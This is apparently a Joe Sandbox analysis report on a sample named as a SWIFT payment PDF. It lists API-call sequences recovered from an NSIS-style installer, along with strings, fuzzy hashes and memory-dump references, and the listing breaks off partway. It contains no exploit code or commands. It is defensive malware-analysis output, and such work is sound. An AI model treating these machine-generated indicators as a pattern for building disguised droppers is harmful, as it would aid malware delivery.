                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 184305955-0
                                                                                                                                • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                • String ID: -B@$N$open
                                                                                                                                • API String ID: 3615053054-1057335957
                                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                                • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 1975747703-1115850852
                                                                                                                                • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                APIs
                                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                • API String ID: 222337774-899692902
                                                                                                                                • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: A
                                                                                                                                • API String ID: 2624150263-3554254475
                                                                                                                                • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                Strings
                                                                                                                                • Null, xrefs: 00402EE5
                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                • Inst, xrefs: 00402ED3
                                                                                                                                • Error launching installer, xrefs: 00402E3E
                                                                                                                                • soft, xrefs: 00402EDC
                                                                                                                                • (*B, xrefs: 00402E7C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 4283519449-2478819026
                                                                                                                                • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                Strings
                                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 900638850-730719616
                                                                                                                                • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                                • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935979016.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2935914078.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2935897449.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935936886.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2935951829.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
